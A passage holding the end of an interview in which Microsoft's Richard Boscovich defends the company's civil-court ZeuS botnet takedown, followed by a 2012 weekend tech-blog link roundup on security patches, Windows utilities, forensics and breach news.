Boscovich: There were some mention that there were legitimate web sites that went down. But you know, the law actually provides a mechanism on that. We put up a cash bond, and we explained to the court that we have a process in place in the event that a legitimate Web site goes down. There were several that were legitimate, but they had been compromised. Our people worked with those sites, and they were not aware they were compromised. And although they were down an hour or two or three, they would probably have never known they were being used by criminal organizations.

Krebs: Some people have been critical of Microsoft’s actions as “vigilante” activity, as participating in the sort of activity that should be left to the authorities. But Microsoft has taken a slightly different approach, attacking this problem through the civil courts. Is there a conflict here, between these two approaches? Isn’t there the possibility that Microsoft’s actions on the civil side could derail progress of law enforcement investigations working the criminal side?

Boscovich: Our strategy, which is a disruptive strategy, came from the idea that there are two ways to tackle this problem; you have the very traditional law enforcement approach, which its ultimate goal has always been that you have to have a well-identified target and arrest that person. We’re not saying necessarily that that’s a bad model. For years and years we fought drug dealers by trying to stop the drugs or stop the distribution. Until we said, why don’t we disrupt them differently by going after their flow of money? And you saw this wave of legislation which came about as anti-money laundering. And we began doing money laundering prosecutions, even though that particular case had absolutely no drugs involved at all, but we were able to show some kind of taint.

Taking that idea, we were able to literally start hitting the criminal enterprises and drug dealers where they really felt it — in their profits. Even though sometimes we didn’t get many arrests, we got seizures, forfeited accounts, forfeited cars, houses. Instead of trying to get the guys behind this, we said why don’t we just strike them where it’s going to hurt them the most? And that is their criminal infrastructure — the botnets — which really allow them to leverage everything they’re doing and make a profit out of it. So we came up with Project Mars and the disruptive strategy.

Krebs: Is it working?

Boscovich: I’d say it is working. Recently, an article came out in the Wall Street Journal that mentioned a huge reduction in spam as a result of botnet takedowns. We’ve taken down Waledac, Rustock and Kelihos. All of them basically spam bots. But that disruptive activity has dented the amount of spam that gets sent out. Even today. And I think that’s a good proof point that the disruptive approach works if you give it time and keep going at it.

What we wanted to do with Zeus was continue with the disruptive approach, but in this case we didn’t target one particular bot. We wanted to make our first assault a much broader assault, and that’s why we went after a particular family of malware, all of them with the same code base, so that we could bring it all together under one legal document, which is under a RICO statute. Kyrus did the malware analysis and found that all these versions bubble back up to the same core code. We wanted to disrupt that business model as much as possible. We knew we were not going to fully eliminate one bot. That was never our intention. And I think we were pretty clear that this was the first salvo to this whole group, to introduce a certain amount of entropy in there, and at that point to try to start increasing the costs of them doing business.

Krebs: It seems like the core dispute here is what should be done with information that is unearthed by security researchers, that the key question is how or who decides when and whether information about certain bad actors should  be acted upon. Would you say that’s accurate? And where do you come down on that?

Boscovich: Microsoft is a pretty big company, and a lot of the stuff we do is based on our own research as well. But we really want to see other companies that have appropriate standing do their own actions. We really believe in the disruptive strategies. We believe that all of this information that’s out there…and the community does amazingly good work in tracing this stuff…but there comes a point in time that you have to action on the information. All this information is great, but if you don’t action on it quickly, that data either becomes stale or it moves. We really believe there are people in industry and the academic and security community that want to have an impact and want to work with us.

Krebs: Were you aware that a number of people Microsoft named in its latest John Doe complaints are considered the core group of folks that the Justice Department has pegged as the guys behind the operations that cost businesses tens of millions of dollars over the last few years?

Boscovich: Based on the investigation that we uncovered so far, we feel very confident that the people we named, with the exception of a few guys that were lower-level players…we feel confident we’ve named the right individuals involved. I really can’t give you all the information we have, other than what’s outlined in the pleadings. But I think the claim that somehow a civil action will destroy all these criminal investigations…I think that’s a fallacy, and near-sighted, and it shows I think a certain naiveté based on not being in that world and not understanding how criminal investigations operate.

Krebs: Can you talk about anything you’ve learned since this action, in terms of the actors involved?

Boscovich: There’s more information that’s coming in, and I feel confident that over the next several weeks and months that will translate into additional updates to the case, and we may amend our complaint. We also are happy to inform that as a result of being able to sinkhole the [ZeuS control] IPs, we can get the location of these infected computers, and work with the community to get this information out. We believe we may be able to get this information out as early as sometime next week.

Krebs: The Fox IT folks and others in the industry have characterized this initiative as little more than a clever public relations stunt by Microsoft, designed principally to make the company look like it is protecting customers from bad guys. How do you respond to that?

Boscovich: It’s not a black or white scenario like the Fox-IT people put it. I’ve been doing this for about 17 years 10 months, I know what very complex criminal investigations [are] and what works well and what works not as well. It’s appropriate and beneficial for both criminal and civil parallel proceedings, because they complement each other.

From a company perspective, and this goes to the PR allegations, of course every corporation is a for-profit corporation. We’re not a charitable institution, obviously. But there are some times when it makes good business sense to actually do good in the community as well. It’s one of those intersections where business and being a good corporate citizen actually complements each other. I’m not going to  be disingenuous and say we don’t have a benefit in doing this. But I can also tell you with a straight face that we do it also because we want to do the right thing, we want to protect our customers, and we want to protect people going on the Internet.

We’re sort of like the emergency room physicians: When someone comes in and they’re bleeding profusely, you have to stabilize the patient and figure out how to stop the bleeding, so that the next guy who comes — the surgeon — who’s waiting in the operating room, is able to save the life of that person. From a  civil perspective, we go in and want to help those victims. We want to stop the bleeding, save as many people as we can and clean their computers.

The question we have to ask ourselves is when you have information about millions of people who are currently victims of crimes because their systems are compromised, do you do the emergency room thing to try to stop the bleeding and try to clean those peoples’ computers so they continue not to be victimized? Or do you do nothing with the information? I think we’ve been fortunate in working with academic and industry partners to share information and address that problem.

In terms of identifying the actual cause, getting to the root, the defendants, all this information, we’re going to pass it on as we have in the past to law enforcement. But I think their investigation will be enriched by a lot of things we can do legally simply because we are a victim and we have access and resources to investigate these things. And then when we pass it along, I believe they’re in a much better position to drill down and use the legal processes that they have — which we do not have — to follow things such as money and financial trails and go overseas to international agreements.

Krebs: With the benefit of hindsight, what — if anything — would you do differently about this operation, if you had to do it all over again?

Boscovich: That’s a good question. I was a little bit taken aback by some of the criticism in light of fact that nobody from fox-it called us to discuss or explain their concerns, or to why some decisions were made legally. We always want to find ways to work with the community and the sharing of information is crucial to that. If you notice, every time we do one of these we have different academic or industry partners that work with us, and we love to rotate those who do work with us. And the ones who want credit, we really try to make sure they get credit where it’s due. We hopefully will try to explain this better, probably at the next DCC [Digital Crimes Consortium, an annual, invite-only Microsoft conference], that we’re on the same team. I think we want the same objectives, so hopefully we can bridge that gap and continue the work we’re doing, to clean these computers, and to disrupt that ecosystem that is being utilized by the criminals.

Krebs: In a nutshell, what would you like to get across or communicate better about this action?

Boscovich: Hopefully, we’ll be able to explain that there are a lot of legal issues involved, and a lot of things we can and cannot do. Some of them many people may not be aware of. Which is understandable: they’re not lawyers. These guys are technical in their field. In the same way I can’t reverse engineer malware, but I’m pretty adept in understanding what are the limitations and potential liability issues when you do these operations. I hopefully can explain that aspect to them, so they have a better understanding and appreciation that when we do things, why we do them the way we do.

I probably should be pleased to have crammed in three posts this weekend.

Alas I am not. I’d intended to get one more “biggie” out the door this weekend…aimed for all you sysadmins. I have in mind a “Case of the Unexplained…” type theme on running down some crazy Windows 7 system behavior on a system at the church-house, multi-GB trace file captures, and sundry stuff like chasing a white rabbit down CPU process utilization percentages and disk utilization by process IO type.

I’m back from that chase with lots of notes, but to do it justice, I’ve got to wait till next week.

So let’s just enjoy our company at final call over these late-breaking weekend links. Hopefully they will carry us into the week with some inspiration and a few shiny new utility toys to play with at our desks.

Adobe April 2012 Black Tuesday Update – ISC Diary – In case you missed it, there were a number of critical Adobe patch updates this week

APSB12-08 – Security updates available for Adobe Reader and Acrobat – Adobe Security Bulletin – Updates now to 9.5.1 and 10.1.3. This goes for both the PDF “reader” versions as well as the “full” Acrobat PDF generating software application. Patch!

At the end of last month some Adobe Flash Player updates came out, one feature of which is to now include an “auto-updater” feature for Flash Player (if so selected in the options). That release back on March 29th was 11.2.202.228.

Guess what snuck out of Adobe Friday (the 13th?). Version 11.2.202.233 of Flash Player.

• 4/13/2012 – Flash Player Update – Adobe Forums
• Flash Player 11.2, AIR 3.2 – Adobe Release Notes
• Adobe – Flash Player – Lists your installed version (check page with each browser you use) and a table of the current version for all platforms.
• Installation problems | Flash Player | Windows – Adobe. I dropped over to this page, then scrolled just a bit lower to the “Install in a firewall proxy server environment” section to grab all of the direct download installer links there.  It’s a one-stop shopping session!  Then I spent some time manually updating my portable browser plugins to all the newest versions. Sheesh. Sadly I’m getting very good at it and have now even crafted a custom batch-file to auto-copy/overwrite the new Flash/Reader version DLL’s to the plugin directories in my browsers to save me time.

If in doubt, try running Qualys BrowserCheck page in each of your web-browsers to check your patch-level or use the Secunia Online Software Inspector (OSI). Either of these tools will help tell you if your browsers are securely patched.

Download just imagex.exe (568k) – TinyApps blog. I LOVE Microsoft’s ImageX.exe imaging tool. It has become second-nature for me to use. If you do a lot of WinPE building and use you probably have already extracted it and keep it handy.  However, if not, TinyApps blog shares a quick tip on getting your hands on it from the WAIK without all the drama of installing the WAIK on your system.

Increase hard disk size in VirtualBox 4.x – TinyApps blog. I know no-one actually creates a virtual hard-drive without first considering (and allocating) all the size they will every need (and then some) before they first get started. Right? TinyApps bloggist has a great walk-though on how to enlarge your drive size without having to mail off for sketchy blue pills. Lots of supporting linkage at the end as well.

Value of Targeted Timeline Analysis in Research – Windows Incident Response blog – Keydet89 provides a great post on the work that goes in towards gaining a better understanding of event timelines and Windows behavior. It’s through detailed work like this that our knowledge gets sharper.

Challenge: What can you do with funky directory names? – ISC Diary post – Mark Baggett warns us to beware those funky file/directory names in Windows! Check out the comments carefully for more feedback. On a related note, the Hexacorn Blog Forensic Riddles posts contain a whole lot more of file-name and directory name tricky shenanigans to be aware of!

NetworkMiner 1.3 Released – NetRecSec has released v1.3 of the amazing (and still free) NetworkMiner NFAT. This release contains a number of new parsing and extraction features. Go get it now! Of course, if you are lucky enough to be able to purchase a copy of the NetworkMiner Professional version — sadly I’m not ;-( — that too has been updated and you can get your upgraded version for free from their customer portal with login. Happy upgrading free and pro’s alike!

eXtra Buttons: utility buttons in the title of the window – freeware – clever little utility that adds a few extra option buttons to your Windows windows. The default windows options in the top-right corner are minimize, maximize, and close. This app gives you up to thirteen options for managing your window, including roll-up/unroll the window at the caption bar, minimize to System Tray, transparency effects, and minimize to a predefined box area on your desktop. I don’t usually use windows tweaking utilities, but this one could be very useful for you multi-window-multi-taskers.

Synkron – freeware – Folder synchronization application. Yeah, I hear you. Claus, really? After that super-long roundup of sync/backup apps you recently posted? Just had to add another one? Yep. This one has a pretty intuitive interface and also comes in a Synkron Portable | PortableApps version as well. More details in this older AddictiveTips blog post.

Colasoft Ping Tool – freeware – Colasoft has a great and super-handy ping tool that supports pinging multiple IP addresses as well as useful charting tools for monitoring and analysis.

Anti-virus scanning exclusions – ISC Diary post – Daniel Wesemann kickstarts a discussion on setting exclusions in your AV scanning policies. Some vendors have recommendations on file/folder exclusions to improve system performance. On the other hand, the thought of creating “safe-zones” that could be exploited by malware for APT landing could outweigh the benefits of following the recommendations. Check out the post and the lively comments that follow. Do you even know if/what your own (or your customers’) policies are regarding AV exclusion settings? Worth looking into.

Malware blocks booting – The H Security. News post about a pretty new ransomware attack that hits the MBR discovered by TrendLabs. While the vector itself isn’t necessarily anything new (messing around with the MBR) apparently the combination of using it in a ransomware attack is. Trend Micros also has instructions for removing the infection if you encounter this bad-boy.

And then there was this “bad news getting worse” over the weekend:

Medicaid hack update: 500,000 records and 280,000 SSNs stolen – ZDNet Zero Day blog.  Original post here: Medicaid hacked: over 181,000 records and 25,000 SSNs stolen.

Expect the fallout from this one to be pretty massive. Quoting from Emil Protalinski’s article linked above:

DTS had recently moved the claims records to a new server, which had a configuration error at the password authentication level, allowing hackers to circumvent the security system. DTS says it shut down the affected server, implemented new security measures, is reviewing every server in the state to ensure proper security measures are in place, identified where the breakdown occurred, and has implemented new processes to ensure this type of breach will not happen again.

It was just a year ago we were dealing with a similar mess here in Texas. Although in that case, it seemed to be more an issues of inside IT data mismanagement rather than a hacker attack. 

Hoping the week ahead gets better even though it hasn’t started yet.

Hang tough and remember “Constant Vigilance!”

–Claus V.